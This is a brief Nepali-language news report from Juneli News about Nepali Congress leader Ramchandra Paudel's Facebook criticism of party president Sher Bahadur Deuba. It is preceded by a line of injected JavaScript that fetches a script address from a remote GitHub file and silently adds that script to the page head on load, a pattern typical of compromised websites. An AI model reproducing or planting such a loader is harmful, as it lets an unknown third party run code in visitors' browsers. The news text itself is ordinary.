;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्यूज, काठमाण्डौ | नेपाली कांग्रेसका पार्टी सभापति शेरबहादुर देउवालाई संकेत गर्दै कांग्रेस पार्टीका वरिष्ठ नेता रामचन्द्र पौडेलले असफल व्यक्ति बारम्बार सत्तामा पुग्छन भन्दै कडा टिप्पणी गरेका छन् |
नेता पौडेलले सभापति देउवालाई संकेत गर्दै सर्वत्र असफल व्यक्ति बारम्बार सत्ता समाल्न पुगेको टिप्पणी गरेका हुन् । ‘यो देशकै विडम्बना हो । सर्वत्र असफल व्यक्तिहरु बारम्बार सत्ता समाल्न पुग्छन्,’ पौडेलले भनेका छन् । पौडेलले महाधिवेशन गर्न नसकेको भन्दै कडा टिप्पणी समेत गरेका छन् ।
पौडेलले सामाजिक सञ्जाल फेसबुकमा यस्तो लेखेका छन् ;
फेसबुक प्रतिक्रियाहरु